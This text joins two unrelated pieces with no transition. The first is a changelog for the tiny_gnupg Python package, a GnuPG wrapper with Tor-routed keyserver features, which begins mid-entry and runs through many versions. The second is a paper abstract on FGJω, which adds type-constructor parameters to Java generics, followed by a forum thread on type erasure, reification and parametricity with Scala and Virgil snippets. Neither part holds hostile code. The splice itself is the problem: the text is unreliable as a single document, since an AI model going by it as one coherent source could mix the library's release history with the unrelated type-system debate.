- The username keyword-only argument to the User & GnuPG classes was given a default empty string. This change allows the username to be optional & ignorable by the user. When generating a key with an instance which doesn’t have a username specified, the associated key will also not contain a username field.
Changes for version 0.8.1
Minor Changes
- Documentation improvements & typo fixes.
Changes for version 0.8.0
Major Changes
- The new GnuPGConfig & Keyserver classes were extracted from the GnuPG class. GnuPGConfig holds onto each instance’s path strings to the system resources (like the gpg2 binary, the .conf file, & the home directory), as well as other static constants & instance specific settings (like the torify boolean flag). And, the Keyserver class separates the Tor networking & key upload, download, & searching logic.
- The GnuPG class was given a super class, BaseGnuPG, which is initialized using User & GnuPGConfig objects instead of the strings & booleans which have until now been used to initialize a GnuPG instance. This allows users to choose between initializing instances using the package’s higher-level types or python built-in types.
- The gen_key method of GnuPG & BaseGnuPG was changed to generate_key.
Minor Changes
- Docstring, documentation & type annotation fixes.
- Improved the clarity of error messages & the UX of error handling.
- Improved various GnuPG terminal output parsing logics.
- Heavy refactorings to improve clarity & better organize the codebase.
Changes for version 0.7.9
Minor Changes
- Docstring & type annotation fixes.
- Small internal refactorings.
Changes for version 0.7.8
Major Changes
- Security Alert: Users’ separate GnuPG instances with the same home directory, which represent distinct & different secret keys, can only be considered to represent separate identities during runtime if the passphrase for each instance is distinct & different. Past updates of the package have mentioned separate identities as if one instance won’t be able to access another’s secret keys, and this is not true unless their passphrases are different. This is how GnuPG itself is designed, where all public & secret keys are stored together in the home directory, & an identity is more strongly considered to be the current operating system’s user. A more effective way a user can separate identities is by setting a unique home directory for each identity. However, the GnuPG program wasn’t designed safely as it regards anonymity, so gaining confidence in its ability to respect more nuanced identity boundaries is dubious at best.
- The values that are inserted into raised exceptions were renamed to be declarative of exactly what has been inserted. I.e., instead of calling all the inserted exception object attributes something as generic as value, they are now inputs, uid, output, etc. This helps improve readability & clarity.
Minor Changes
- Various documentation improvements & fixes.
- Various code cleanups & refactorings.
- Added type hints to many of the codebase’s parameters.
Changes for version 0.7.7
Minor Changes
- Some documentation improvements & refactorings.
Changes for version 0.7.6
Major Changes
- Added the new Issue class. It takes care of raising exceptions & giving error messages to the user for issues which aren’t caused by calling the gpg2 binary. This comes with some refactorings.
Minor Changes
- Various code cleanups & refactorings.
Changes for version 0.7.5
Major Changes
- New Terminal, MessageBus & Error classes were created to assist in some heavy refactorings of the codebase. Separating error handling logic & sending commands to the terminal into their own classes & methods.
Minor Changes
- Removed the import-drop-uids option from the package’s import commands for several reasons. First, this option doesn’t work on most systems. Second, if it did work, the result would be problematic, as that would mean all uid information would always be dropped from imported keys. This option was intended to keep GnuPG from crashing when importing keys which don’t have uid information, but it’s an unideal hack around the root problem.
- Some changes to function signatures for a better ux, & various code cleanups.
Changes for version 0.7.4
Minor Changes
- The homedir, options, executable, _base_command, & _base_passphrase_command attributes are now all properties. This keeps their values in-sync even after a user changes a GnuPG instance’s configurations. This also backtracks the last update’s solution of resetting static values after every mutation, to a solution which reads attributes live as they’re queried. The reduced efficiency of not using cached values is not noticeable in comparison to the many milliseconds it takes to run any gpg2 command.
- Reordering of the methods in the GnuPG class to better follow a low-level to high-level overall semantic structure, with positional groupings of methods which have related functionalities.
- Some other code refactorings, cleanups & docstring fixes.
Changes for version 0.7.3
Minor Changes
- Now, after either the paths for the executable, homedir or config file are changed by the user, the _base_command & _base_password_command string attributes are reset to mirror those changes. This keeps the instance’s state coherent & updated correctly.
Changes for version 0.7.2
Minor Changes
- Changed the default directory for the gpg executable to /usr/bin/gpg2. This isn’t going to be appropriate for all users’ systems. But, now many users on linux installations won’t need to pass in a path manually to get the package to work.
Changes for version 0.7.1
Minor Changes
- Some interface refactorings for the Network class.
- Some docstring & readme fixes.
Changes for version 0.7.0
Major Changes
- The package no longer comes with its own gpg2 binary. The GnuPG class was altered so that a user can set the path to the binary that exists on their system manually. The path to the config file & to the home directory can also be set independently now as well. Although, the home directory & config file still default to the ones in the package. These changes should allow users to more easily utilize the package even if they aren’t using Debian-like operating systems.
- The interface for the GnuPG class was also made a bit smaller by making some methods private.
- The asynchronous file import & export functions were switched to synchronous calls. This is a push towards a more synchronous focus, as the gpg2 binary & gpg-agent processes don’t play well with threaded or truly asynchronous execution. The networking asynchrony will remain.
- Heavy refactoring of method names to make the interface more unified & coherent.
- The GnuPG class now only receives keyword-only arguments. The username, email & passphrase parameters no longer use empty default string values.
- Removed the network_sks_import method which was no longer working. The onion sks server seems to change its onion address too frequently to maintain support within the package.
- Created Network & User classes to better separate concerns to dedicated & expressive objects.
Minor Changes
- Various refactorings.
- Some bug fixes in the html parsing of the keyserver responses.
Changes for version 0.6.1
Minor Changes
- Edits to test_tiny_gnupg.py.
Major Changes
- Cause of CI build failures found. The sks/pks keyserver’s onion address was not accessible anymore. They seemed to have switched to a new onion address.
Changes for version 0.6.0
Minor Changes
- Changes to deduce bug causing CI failure.
Major Changes
- Switch from aiohttp_socks’s deprecated SocksProxy to the newer and supported ProxyConnector.
Changes for version 0.5.9
Minor Changes
- Add checks in network_sks_import() for html failure sentinels.
Major Changes
- Spread out the amount of queries per key in test_tiny_gnupg.py so the keyserver’s rate limiting policies don’t cause the CI build to fail as often.
Changes for version 0.5.8
Minor Changes
- Fix setup attribution kwargs in setup.py.
Major Changes
- Added new network_sks_import() method which allows users to query the sks infrastructure for public keys as well. We use an onion address mirror of the sks/pks network.
- Added new manual kwarg to command which simplifies the process of using the GnuPG() class to manage gpg2 non-programmatically. Passing manual=True will allow users to craft commands and interact directly with the gpg2 interface.
Changes for version 0.5.7
Minor Changes
- Tests added to include checks for instance-isolated identities.
Major Changes
- reset_daemon() calls added to decrypt(), verify(), sign() & encrypt(). This call kills the gpg-agent process & restarts it, which in turn wipes the caching of secret keys available on the system without a passphrase. This is crucial for users of applications with multiple GnuPG objects that handle separate key identities. That’s because these methods will now throw PermissionError or LookupError if a private key operation is needed from an instance which is already assigned to another private key in the keyring. This gives some important anonymity protections to users.
- More improvements to error reporting.
Changes for version 0.5.6
Minor Changes
- Added newly developed auto_decrypt() & auto_encrypt() methods to the README.rst tutorial.
- Allow keyserver queries with spaces by replacing " " with url encoding "%20".
- packet_fingerprint(target="") & list_packets(target="") methods now raise TypeError when target is clearly not OpenPGP data.
- Tests added to account for new error handling in tiny_gnupg.py.
Major Changes
- --no-tty seems to keep most of the noise from terminal output while also displaying important banner information. For instance, signature verification still produces detailed signature information. Because it automatically seems to behave as desired, it’s here to stay.
Changes for version 0.5.5
Minor Changes
- Added to Known Issues. Our package can’t build on Github (Or most any CI service) for many reasons related to their build environments using Docker & an issue in GnuPG itself.
- Removed Above known issue as a fix was found for using the Github CI tool.
- Added _home, _executable, & _options attributes which store the pathlib.Path.absolute() representation of the associated files & directories.
- Added options attribute which is the str value of the _options pathlib path to the configuration file used by the package.
Major Changes
- Added "--no-tty" option to command() method which conveniently tells gpg2 not to use the terminal to output messages. This has led to a substantial, possibly complete, reduction in the amount of noise gpg2 prints to the screen. Some of that printed information is helpful to see, though. We would add it back in places where it could be informative, but passing "--no-tty" has the added benefit of allowing Docker not to break right out of the gate of a build test. More thought on this is required.
- Removed pathlib from imports. That module has been in the standard library since c-python3.4. This package isn’t looking to be supported for anything older than 3.6.
Changes for version 0.5.4
Minor Changes
- Style edits to PREADME.rst.
Major Changes
- Fixed a major bug in decrypt() which miscategorized a fingerprint scraped from a message as the sender’s, when in fact it should be the recipient’s. Getting the sender’s fingerprint requires successfully decrypting the message & scraping the signature from inside if it exists. We do this now, raising LookupError if the signature inside has no corresponding public key in the package keyring.
- Added new auto_encrypt() method which follows after auto_decrypt() in allowing a user to attempt to encrypt a message to a recipient’s key using the value in the uid kwarg. If there’s no matching key in the package keyring, then the keyserver is queried for a key that matches uid, where the message is then encrypted if found, or FileNotFoundError is raised if not.
- Added better exception raising throughout the GnuPG class:
- Now, instead of calling read_output() when the supplied uid has no key in the package keyring, a LookupError is raised.
- The best attempt at deriving a 40-byte key fingerprint from uid is returned back through the LookupError exception object’s value attribute for downstream error handling.
- verify() raises PermissionError if verification cannot be done on the message kwarg. Raises LookupError instead if a public key is needed in order to attempt verification. verify() can’t be used on encrypted messages in general, unless message is specifically a signature, not encrypted plaintext. This is just not how verify works. Signatures are on the inside of encrypted messages. So decrypt() should be used for those instead; it throws if a signature is invalid on a message.
- A rough guide now exists for what exceptions mean, since we’ve given names & messages to the most likely errors, & helper functions to resolve them. Users can now expect to run into more than just the nondescript CalledProcessError. Exceptions currently being used include: LookupError, PermissionError, TypeError, ValueError, KeyError, & FileNotFoundError.
- ValueError raised in text_export() & sign() switched to TypeError as it’s only raised when their secret or key kwargs, respectively, are not of type bool.
Changes for version 0.5.3
Minor Changes
- Fixing PyPi README.rst rendering.
Changes for version 0.5.2
Minor Changes
- Further test cleanups. We’re now at 100% line coverage & 99% branch coverage.
- Code cleanups. raw_packets() now passes the uid information it’s gathered through the KeyError exception, in the value attribute instead of copying subprocess’s output attribute naming convention.
- License, coverage, package version badges added to README.rst.
Changes for version 0.5.1
Minor Changes
- Fixed inaccuracies & mess-ups in the tests. Added tests for parsing some legacy keys’ packets with raw_packets().
Major Changes
- Bug in the packet parser has been patched which did not correctly handle or recognize some legacy key packet types. This patch widens the pool of compatible OpenPGP versions.
Changes for version 0.5.0
Minor Changes
- Removed coverage.py html results. They are too big, & reveal device specific information.
Changes for version 0.4.9
Minor Changes
- Various code cleanups.
- Added to test cases for auto fetch methods & packet parsing.
- Documentation improvements: README.rst edits. CHANGES.rst Known Issues moved to its own section at the top. Docstrings now indicate code args & kwargs in restructured text, double tick format.
- Added use-agent back into the gpg2.conf file to help gnupg to not open the system pinentry window. This may have implications for anonymity since multiple instances running on a user machine will be able to use the same agent to decrypt messages, even if the decrypting instance wasn’t the intended recipient. This may be removed again. A factor in this decision is that it’s not clear whether removing it or adding no-use-agent would even have an impact on the gpg-agent’s decisions.
- _session, _connector, session & connector constructors were renamed to title case, since they are class references or are class factories. They are now named _Session, _Connector, Session & Connector.
- Added some functionality to setup.py so that the long_description on PyPI which displays both README.rst & CHANGES.rst, will also be displayed on github through a combined README.rst file. The old README.rst is now renamed PREADME.rst.
Major Changes
- 100% test coverage!
- Fixed bug in raw_packets() which did not return the packet information when gnupg throws a “no private key” error. Now the packet information is passed in the output attribute of the KeyError exception up to packet_fingerprint() and list_packets(). If another cause is determined for the error, then CalledProcessError is raised instead.
- packet_fingerprint() now returns a 16 byte key ID when parsing packets of encrypted messages which would throw a gnupg “no private key” error. The longer 40 byte fingerprint is not available in the plaintext packets.
- New list_packets() method added to handle the error scraping of raw_packets() & return the target’s metadata information in a more readable format.
- Fixed bug in format_list_keys() which did not properly parse raw_list_keys(secret=False) when secret was toggled to True to display secret keys. The bug would cause the program to falsely show that only one secret key exists in the package keyring, irrespective of how many secret keys were actually there.
- Added a second round of fingerprint finding in decrypt() and verify() to try to return more accurate results to callers and in the raised exception’s value attribute used by auto_decrypt() & auto_verify().
Changes for version 0.4.8
Minor Changes
- Fixed typos across the code.
- Added to test cases.
- Documentation improvements. CHANGES.md has been converted to CHANGES.rst for easy integration into README.rst and long_description of setup.py.
- README.rst tutorial expanded.
- Condensed command constructions in set_base_command() and gen_key() by reducing redundancy.
- Fixed the delete() method’s noisy printed output when called on a key which doesn’t have a secret key in the package’s keyring.
Major Changes
- Added a secret kwarg to list_keys() method which is a boolean toggle between viewing keys with public keys & viewing keys with secret keys.
- Added a reference to the asyncio.get_event_loop().run_until_complete function in the package. It is now importable with from tiny_gnupg import run or from tiny_gnupg import *. It was present in all of the tutorials, & since we haven’t decided to go either all async or sync yet, it’s a nice helper.
- Added raw_packets(target="") method which takes in OpenPGP data, like a message or key, & outputs the raw terminal output of the --list-packets option. Displays very detailed information of all the OpenPGP metadata on target.
- Added packet_fingerprint(target="") method which returns the issuer fingerprint scraped off of the metadata returned from raw_packets(target). This is a very effective way to retrieve uid information from OpenPGP signatures, messages & keys to determine beforehand whether the associated sender’s key is or isn’t already in the package’s keyring.
Changes for version 0.4.7
Minor Changes
- Fixed typos across the code.
- Added to test cases.
- Added tests explanation in test_tiny_gnupg.py.
- Documentation improvements.
Major Changes
- Added exception hooks to decrypt() & verify() methods. They now raise KeyError when the OpenPGP data they’re verifying require a signing key that’s not in the package’s keyring. The fingerprint of the required key is printed out & stored in the value attribute of the raised exception.
- Added new auto_decrypt() & auto_verify() async methods which catch the new exception hooks to automatically try a torified keyserver lookup before raising a KeyError exception. If a key is found, it’s downloaded & an attempt is made to verify the data.
Changes for version 0.4.6
Minor Changes
- Added to test cases.
- Changed the project long description in the README.rst.
- Added docstrings to all the methods in the GnuPG class, & the class itself.
Major Changes
- Turned off options in gpg2.conf require-cross-certification and no-comment because one or both may be causing a bug where using private keys raises an “unusable private key” error.
Changes for version 0.4.5
Minor Changes
- Updated package metadata files to be gpg2.conf aware.
Major Changes
- Added support for a default package-wide gpg2.conf file.
Changes for version 0.4.4
Minor Changes
- Added new tests. We’re at 95% code coverage.
Major Changes
- Changed the default expiration date on generated keys from never to 3 years after creation. This is both for the integrity of the keys & a courtesy to the key community, by not recklessly creating keys that never expire.
- Added revoke(uid) method, which revokes the key with matching uid if the secret key is owned by the user & the key passphrase is stored in the instance’s passphrase attribute.
Changes for version 0.4.3
Minor Changes
- Changed package description to name more specifically the kind of ECC keys this package handles.
- Removed the trailing newline character that was inserted into the end of every encrypt() & sign() message.
- Added new tests.
Major Changes
- Fixed bug in __init__() caused by set_base_command() not being called before the base commands are used. This led to the fingerprint for a persistent user not being set automatically.
Changes for version 0.4.2
Minor Changes
- Added some keyword argument names to README.rst tutorials.
- Added section in README.rst about torification.
Major Changes
- Added a check in encrypt() for the recipient key in the local keyring which throws if it doesn’t exist. This is to prevent gnupg from using wkd to contact the network to find the key on a keyserver.
- Added a new torify=False kwarg to __init__() which prepends "torify" to each gpg2 command if set to True. This will make sure that if gnupg makes any silent connections to keyservers or the web, they are run through tor & don’t expose a user’s ip address inadvertently.
Changes for version 0.4.1
Minor Changes
- Fixed typos in tiny_gnupg.py.
Changes for version 0.4.0
Minor Changes
- Added keywords to setup.py
- Added copyright notice to LICENSE file.
- Code cleanups.
- Updated README.rst tutorials.
- Added new tests.
- Include .gitignore in MANIFEST.in for PyPI.
- Made all path manipulations more consistent by strictly using pathlib.Path for directory specifications.
- Added strict truthiness avoidance to sign() for the key boolean kwarg.
- Added strict truthiness avoidance to text_export() for the secret boolean kwarg.
Major Changes
- Added key kwarg to the sign(target="", key=False) method to allow users to toggle between signing arbitrary data & signing a key in the package’s local keyring.
- Changed the message kwarg in sign(message="") to target so it is also accurate when the method is used to sign keys instead of arbitrary data.
Changes for version 0.3.9
Minor Changes
- Added new tests.
Major Changes
- Fixed new crash caused by --batch keyword in encrypt(). When a key being used to encrypt isn’t ultimately trusted, gnupg raises an error, but this isn’t a desired behavior. So, --batch is removed from the command sent from the method.
Changes for version 0.3.8
Minor Changes
- Added new tests.
- Removed base_command() method because it was only a layer of indirection. It was merged into command().
Major Changes
- Added the --batch, --quiet & --yes arguments to the default commands contructed by the command() method.
- Added the --quiet & --yes arguments to the command constructed internally to the gen_key() method.
- Added a general uid -> fingerprint conversion in delete() to comply with gnupg limitations on how to call functions that automatically assume yes to questions. The upshot is that delete() is now fully automatic, requiring no user interaction.
Changes for version 0.3.7
Minor Changes
- Added new tests.
- Typos & inaccuracies fixed around the code & documentation.
Major Changes
- Added new secret kwargs to text_export(uid, secret=bool) and file_export(path, uid, secret=bool) to allow secret keys to be exported from the package’s environment.
- Added new post(url, **kw) & get(url, **kw) methods to allow access to the networking tools without having to manually construct the network_post() & network_get() context managers. This turns network calls into one liners that can be more easily wrapped with an asyncio run function.
Changes for version 0.3.6
Minor Changes
- Added new tests for networking methods.
- Documentation updates & accuracy fixes.
Major Changes
- Removed a check in network_import() which wasn’t useful and should’ve been causing problems with imports, even though the tests didn’t seem to notice.
Changes for version 0.3.5
Minor Changes
- Switched the aiocontext package license with the license for asyncio-contextmanager.
Major Changes
- The packaging issues seem to be resolved. Packaging as v0.3.5-beta, the first release that did not ship completely broken through pip install --user tiny_gnupg.
Changes for version 0.3.4
Major Changes
- Fixing a major bug in the parameters passed to setup() which did not correctly tell setuptools to package the gpghome folder & gpg2 binary. This may take a few releases to troubleshoot & bug fix fully.
Changes for version 0.3.3
Major Changes
- Fixed a big bug where the wrong package was imported with the same name as the intended module. AioContext was imported in setuptools, but the package that is needed is asyncio-contextmanager for its aiocontext module. This lead to the program being un-runable due to an import error.
Changes for version 0.3.2
Minor Changes
- Rolled back the changes in trust() that checked for trust levels on keys to avoid sending an unnecessary byte of data through the terminal. Mostly because the attempted fix did not fix the issue. And the correct fix involves a wide branching of state & argument checking. That runs contrary to the goal of the package for simplicity, so it isn’t going to be addressed for now.
- Edited some of the README.rst tutorials.
Major Changes
- Fix bug in file_import() method where await wasn’t called on the keyfile.read() object, leading to a crash.
Changes for version 0.3.1
Minor Changes
- Fixed a bug in trust() which caused an extra b"y\n" to be sent to the interactive prompt when setting keys as anything but ultimately trusted. This was because there’s an extra terminal dialog asking for a "y" confirmation that is not there when a key is being set as ultimately trusted. This didn’t have a serious effect other than displaying an "Invalid command (try ‘help’)" dialog.
- Removed local_user kwarg from the raw_list_keys() and trust() methods, as it doesn’t seem to matter which “user” perspective views the list of keys or modifies trust. It is very likely always displaying keys from the perspective of the global agent.
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
Major Changes
- Fixed a bug in encrypt() which caused a “y\n” to be prepended to plaintext that was sent to ultimately trusted keys. This was because there’s an extra terminal dialog asking for a “y” confirmation that is not there when a key is ultimately trusted.
- Added a key_trust(uid) method to allow easy determination of trust levels set on keys in the local keyring.
Changes for version 0.3.0
Minor Changes
- Changed MANIFEST.in to a more specific include structure, & a redundant exclude structure, to more confidently keep development environment key material from being uploaded during packaging.
Major Changes
- Overhauled the gen_key() which now creates a different set of default keys. We are no longer creating one primary key which does certifying & signing, with one subkey which handles encryption. Instead, we create one certifying primary key, with three subkeys, one each for handling encryption, authentication, & signing. This is a more theoretically secure default key setup, & represents a common best-practice.
Changes for version 0.2.9
Minor Changes
- Edited some of the README.rst tutorials
- Changed file_import()’s filename kwarg to path for clarity.
- Fixed bug in trust() which would allow a float to be passed to the terminal when an integer was needed.
- Changed the way the email address in displayed in network_export(), removing the surrounding list brackets.
- Changed the FILE_PATH global to HOME_PATH for clarity.
- Changed the id_link variable in network_import() to key_url for clarity.
Major Changes
- Fixed a bug in format_list_keys() which would improperly split the output string when uid information contained the "pub" string.
Changes for version 0.2.8
Minor Changes
- Edited some of the README.rst tutorials.
Major Changes
- Fixed a bug in the trust() method which caused it to never complete execution.
- Fixed a bug in the trust() method which falsely made 4 the highest trust level, instead of 5.
Changes for version 0.2.7
Minor Changes
- Fixed statement in README.rst describing bug #T4393.
Changes for version 0.2.6
Minor Changes
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Added a new POST request tutorial to the README.rst.
- Added "local_user" kwarg to some more methods where the output could at least be partially determined by the point of view of the key gnupg thinks is the user’s.
Major Changes
- Added a signing toggle to the encrypt(sign=True) method. Now, the method still automatically signs encrypted messages, but users can choose to turn off this behavior.
- Added a trust(uid="", level=4) method, which will allow users to sign keys in their keyring on a trust scale from 1 to 4.
- Fixed a bug in set_fingerprint(uid="") which mistakenly used an email parameter instead of the locally available uid kwarg.
Changes for version 0.2.5
Minor Changes
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
- Changed raw_network_export() & raw_network_verify() methods into raw_api_export() & raw_api_verify(), respectively. This was done for more clarity as to what those methods are doing.
Major Changes
- Added sign(message) & verify(message) methods.
- Changed the keyserver & searchserver attributes into properties so that custom port attribute changes are now reflected in the constructed url, & the search string used by a custom keyserver can also be reflected.
- Moved all command validation to the read_output() method which simplifies the construction of command() & will automatically shlex.quote() all commands, even those hard-coded into the program.
- Fixed bug in set_homedir() which did not construct the default gpghome directory string correctly depending on where the current working directory of the calling script was.
- Added local_user kwarg to encrypt() & sign() so a user can specify which key to use for signing messages, as gnupg automatically signs with whatever key it views as the default user key. Instead, we assume messages are to be signed with the key associated with the email address of a GnuPG class instance, or the key defined by the local_user uid if it is passed.
- Fixed --list-keys terminal output parsing. We now successfully parse & parameterize the output into email addresses & fingerprints for a larger set of key types.
- Added delete() method for removing both public & private keys from the local keyring. This method still requires some user interaction because a system pinentry-type dialog box opens up to confirm deletion. Finding a way to automate this to avoid user interaction is in the works.
- Added automating behavior to the sign() & encrypt() methods so that keys which haven’t been verified will still be used. This is done by passing “y” (yes) to the terminal during the process of the command.
Changes for version 0.2.4
Minor Changes
- Updated setup.py with more package information.
- Typos, redundancies & naming inaccuracies fixed around the code and documentation.
- Tests updated & added to.
Changes for version 0.2.3
Minor Changes
Changes for version 0.2.2
Minor Changes
- Typos & naming inaccuracies fixed around the code and documentation.
- Switched the internal networking calls to use the higher level network_get() & network_post() methods.
- Removed redundant shlex.quote() calls on args passed to the command() method.
- Tests updated & added to.
Changes for version 0.2.1
Minor Changes
- The names of some existing methods were changed. parse_output() is now read_output(). gpg_directory() is now format_homedir(). The names of some existing attributes were changed. gpg_path is now executable, with its parent folder uri now stored in home. key_id is now fingerprint to avoid similarities with the naming convention used for the methods which query the package environment keys for uid information, i.e. key_fingerprint() & key_email().
Major Changes
- Good riddance to the pynput library hack! We figured out how to gracefully send passphrases & other inputs into the gpg2 commandline interface. This has brought major changes to the package, & lots of increased functionality.
- Many added utilities:
- Keys generated with the gen_key() method now get stored in a local keyring instead of the operating system keyring.
- aiohttp, aiohttp_socks used to power the keyserver queries and uploading features. All contact with the keyserver is done over tor, with async/await syntax. search(uid) to query for a key with matches to the supplied uid, which could be a fingerprint or email address. network_import(uid) to import a key with matches to the supplied uid. network_export(uid) to upload a key in the package’s keyring with matches to the supplied uid to the keyserver. Also, raw access to the aiohttp.ClientSession networking interface is available by using async with instance.session as session:. More info is available in the aiohttp docs
- New text_import(key), file_import(filename), text_export(key), & file_export(path, uid) methods for importing & exporting keys from key strings or files.
- New reset_daemon() method for refreshing the system gpg-agent daemon if errors begin to occur from manual deletion or modification of files in the package/gpghome/ directory.
- New encrypt(message, recipient_uid) & decrypt(message) methods. The encrypt() method automatically signs the message, therefore needs the key passphrase to be stored in the passphrase attribute. The same goes for the decrypt() method.
- The command(*options), encode_inputs(*inputs), and read_output(commands, inputs) methods can be used to create custom commands to the package’s gpg2 environment. This allows for flexibility without hardcoding flexibility into every method, which would increase code size & complexity. The command() method takes a series of options that would normally be passed to the terminal gpg2 program (such as --encrypt) & returns a list with those options included, as well as the other boiler-plate options (like the correct path to the package executable, & the package’s local gpg2 environment). encode_inputs() takes a series of inputs that will be needed by the program called with the command() instructions, & bytes() encodes them with the necessary linebreaks to signal separate inputs. read_output() takes the instructions from command() and inputs from encode_inputs() & calls subprocess.check_output(commands, input=inputs).decode() on them to retrieve the resulting terminal output.
Vincent Cremet and Philippe Altherr: Adding Type Constructor Parameterization to Java, JOT vol. 7, no. 5.
We present a generalization of Java’s parametric polymorphism that enables parameterization of classes and methods by type constructors, i.e., functions from types to types. Our extension is formalized as a calculus called FGJω. It is implemented in a prototype compiler and its type system is proven safe and decidable. We describe our extension and motivate its introduction in an object-oriented context through two examples: the definition of generic data-types with binary methods and the definition of generalized algebraic data-types. The Coq proof assistant was used to formalize FGJω and to mechanically check its proof of type safety.
FGJω is a simple extension of (Featherweight) Java's generics, where type parameters may be type constructors (functions from types to types). This very readable paper finally made me understand GADTs.
(Previously: Generics of a Higher Kind on Scala's support for the same idea.)
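For readers new to the idea, here is a minimal Scala sketch (mine, not from the paper) of what parameterization by a type constructor buys you: Functor is indexed by F, a function from types to types, so one interface covers List, Option, and any other container.

trait Functor[F[_]] {
  def map[A, B](fa: F[A])(f: A => B): F[B]
}

// Two instances of the same abstraction over different type constructors:
object ListFunctor extends Functor[List] {
  def map[A, B](fa: List[A])(f: A => B): List[B] = fa.map(f)
}

object OptionFunctor extends Functor[Option] {
  def map[A, B](fa: Option[A])(f: A => B): Option[B] = fa.map(f)
}

For example, ListFunctor.map(List(1, 2, 3))(_ + 1) yields List(2, 3, 4). In Java's generics F itself cannot be a parameter, which is exactly the restriction FGJω lifts.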
I'm sure this is a nice paper, but at this point, I really have to doubt the chances of anything like this ever making it into "real" Java. I would like to be proven wrong, though...
Given the choice to go with type erasure as the "implementation" choice for generics in Java 5 (and look how well that turned out), I would hope that they don't actually attempt putting this in Java.
I don't see how erasure causes a problem for type constructor polymorphism.
Especially considering that Scala has erasure and type-constructor polymorphism.
As far as I know, Scala does not implement polymorphism by type erasure.
It does. You can prove it with a simple type case (here I use an unbounded existential type parameter but that's not essential to the demonstration).
scala> def test(x : List[_]) = x match {
| case _ : List[Int] => "it's ints!"
| case _ : List[String] => "it's strings!"
| }
<console>:5: warning: non variable type-argument Int in type pattern List[Int] is unchecked since it is eliminated by erasure
case _ : List[Int] => "it's ints!"
^
<console>:6: warning: non variable type-argument String in type pattern List[String] is unchecked since it is eliminated by erasure
case _ : List[String] => "it's strings!"
<console>:4: warning: match is not exhaustive!
missing combination $colon$colon
def test(x : List[_]) = x match {
^
test: (x: List[_])java.lang.String
scala> test(List('a', 'b', 'c'))
res1: java.lang.String = it's ints!
Ah, my mistake. Though such typecases are "impure" in some people's eyes, I sometimes find them useful to implement a kind of ad-hoc polymorphism, e.g. in Virgil, which does not (yet) have a typeclass mechanism, but has parametric types and does not erase them. This means that the compiler must specialize the code when compiling for the JVM. Full specialization of course causes problems with polymorphic recursion, unfortunately.
I think in Scala anytime erasure hurts you it's because you've violated parametricity. As you say that's sometimes useful. In Java erasure also hurts due to interference with other parts of the language. To answer your other question, that was the Scala library List but any type constructor would do.
What about allocating an array of a parametric type? Unlike parametrized classes, arrays in Java can be thought of as a type constructor that actually does reify its type parameters at runtime.
Note also that parametricity also interacts with inheritance--you can "hide" types by creating an unparameterized superclass and casting to the parameterized subclass. Doing so may not technically be a violation of parametricity. I also sometimes find this useful, e.g. (Virgil syntax, which I hope you can work out through context):
class Val {
}
class Box<T> extends Val {
field x: T;
new(x: T) { this.x = x; }
}
...
class Interpreter {
method unbox<T>(v: Val) -> T {
// cast and access value
return Box<T>.!(v).x;
}
method add(v1: Val, v2: Val) -> Val {
// note type inference for unbox() calls and Box.new() call
return Box.new(unbox(v1) + unbox(v2));
}
}
(Note that there is no language level boxing in Virgil--these are all simply user classes.)
Here's another example that reuses the Box and Val classes:
class Other {
method castOrNull<T>(v: Val) -> Box<T> {
// check if cast would succeed
if (Box<T>.?(v)) return Box<T>.!(v);
else return null; // cast would fail, return null
}
}
This kind of pattern has started to show up in lots of places in my compiler, and I find it pretty convenient. The first example can be done in Java, but the second example absolutely requires reified types (or specialization).
That's an interesting point about parameterized subclasses and extracting values of a certain type using something like Maybe or Null. So I take it back: there are some parametricity-preserving ways to use full run time type information.
As for arrays in Scala, they are a bit complicated. For more than you ever wanted to know about how Scala deals with them see this document describing both the old and new system for arrays.
You're right, that is more than I wanted to know about Scala arrays :-) The conclusion I came to some time back was that if you want real parametric types with all the capabilities, you have two choices: type parameters are either implicit reified parameters, or type parameters are completely specialized away. As far as I know, Haskell (at least GHC) takes the former approach, and C++ obviously takes the latter approach. The CLR also specializes, but the VM does this underneath (type parameters are explicit in class files). Type erasure like Java is broken in too many ways to count.
If your language is going to have a VM, then I think the C# approach is best. If your language is going to target a real machine, then I think a mix of reification and specialization is the best approach, though I have yet to come across an implementation that does both.
I think you're wrong about GHC. Type classes are "implicit reified parameters" (although they're often specialized away), but plain old type parameters are erased. Maybe I misunderstand what you're saying, though.
Why would we not consider Box<T>.! and Box<T>.? to violate parametricity? Before reading any of this, I would have certainly considered casts or "can cast queries" as parametricity violations.
The conclusion I came to some time back was that if you want real parametric types with all the capabilities, you have two choices: type parameters are either implicit reified parameters, or type parameters are completely specialized away.
If run-time casts are among the capabilities you want, then this would seem to be true, but I don't see why it should be true otherwise. Do you have other examples or arguments? (As I'm working on a language with type erasure, I'd love to understand your reasoning here!)
I don't consider polymorphic casts of this type to be a violation of parametricity*, but there is another instance where problems arise. Even if you don't use runtime casts, if your types don't have a uniform representation in the machine you are translating to (e.g. primitives vs. objects on the JVM), you will need some runtime type information in order to, for example, allocate an array with the appropriate representation, or allocate an object that has a field of the parametric type. Worse, at the machine level, even passing a value of a parametric type might require a different register (or set of registers) depending on its type and the calling conventions established by your compiler or the ABI of your platform.
However, you are right in that most of the problems that manifest for programmers rather than implementors seem to stem from runtime type tests of one kind or another. For example, if you have inheritance and overriding in your language, you can try to simulate casts by writing is/as methods, but even with the hidden type parameter, you still end up needing a polymorphic cast inside!
class A {
method isB<X>() -> bool { return false; }
method asB<X>() -> B<X> { return null; }
}
class B<T> extends A {
method isB<X>() -> bool {
// yes, we are a B<T>, but are we a B<X> ???
return B<X>.?(this);
}
method asB<X>() -> B<X> {
// hide the cast in here....
return B<X>.!(this);
}
}
So maybe I should amend my earlier conclusion. If you have a nonuniform representation of types in your implementation, or if you have runtime type tests of any kind, you will have to either reify or specialize to get the full power of parametric types.
* The possibility that a type test could fail or a cast throw an exception is independent of whether parametric types are involved.
I think much of my confusion in this subthread has been from the application of "parametricity" to an OOP setting. Parametricity is about types of functions reflecting the operations those functions perform on their parameters. If every value in the language is an object supporting "type casting" (really a form of constructor matching) then you'll still have some sort of "parametricity theorem", but the free theorems will be extremely weak (probably useless).
I favor not having any operations built in to every value, and letting values come equipped with extra tagging information in special situations if needed. Anyway, I agree with most of the stuff you wrote. This is just clarifying my position and explaining my confusion.
If every value in the language is an object supporting "type casting" (really a form of constructor matching) then you'll still have some sort of "parametricity theorem"
I don't see how. Casts and reflection break parametricity straight out, no way around that. The analogy with constructor matching is misleading, because with constructors there is no persistent 1-to-1 correspondence to types.
